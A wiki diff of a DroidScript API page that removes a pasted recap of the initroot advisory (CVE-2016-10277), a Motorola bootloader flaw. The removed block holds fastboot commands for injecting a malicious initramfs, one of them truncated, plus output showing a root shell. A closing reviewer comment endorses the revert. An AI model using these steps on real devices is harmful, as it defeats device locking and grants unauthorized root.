built_in:start [2018/12/30 13:41] 182.1.63.175 [Built-in features - DroidScript API]
built_in:start [2018/12/31 01:07] (current)
Line 1: | Line 1: | ||
- | Sources: | + | ======Built-in features - DroidScript API====== |
- | https:// | + | |
- | https:// | + | |
- | initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277) | ||
- | By Roee Hay / Aleph Research, HCL Technologies | ||
- | |||
- | Recap of the Vulnerability and the Tethered-jailbreak | ||
- | |||
- | 1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection. | ||
- | 2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address. | ||
- | 3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices). | ||
- | 4. Exploiting the vulnerability allows the adversary to gain unconfined root shell. | ||
- | 5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot. | ||
- | For example, here is a successful run of the exploit on cedric (Moto G5) | ||
- | |||
- | $ fastboot oem config fsg-id "a initrd=0xA2100000, | ||
- | $ fastboot flash aleph initroot-cedric.cpio.gz | ||
- | $ fastboot continue | ||
- | |||
- | $ adb shell | ||
- | cedric:/ # id | ||
- | uid=0(root) gid=0(root) groups=0(root), | ||
- | cedric:/ # getenforce | ||
- | Permissive | ||
- | cedric:/ # | ||
- | |||
- | |||
- | Proof of Concept: | ||
- | https:// | ||
- | |||
- | | ||
====Links==== | ====Links==== | ||
^App and Layout^ | ^App and Layout^ |
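Review bot: the removed block is off-topic for this DroidScript API page: it is a pasted copy of Roee Hay / Aleph Research's initroot advisory (CVE-2016-10277, Motorola ABOOT kernel cmdline injection), and even as an advisory it was unusable here, since the "Sources:" and "Proof of Concept:" URLs survive only as bare "https://" and the first exploit step is cut off after `fastboot oem config fsg-id "a initrd=0xA2100000,`. Reverting to the `======Built-in features - DroidScript API======` heading is the right change; the one thing to check after applying it is that the `====Links====` / `^App and Layout^` table that follows still renders under the restored heading, because the old revision had no heading above it at all.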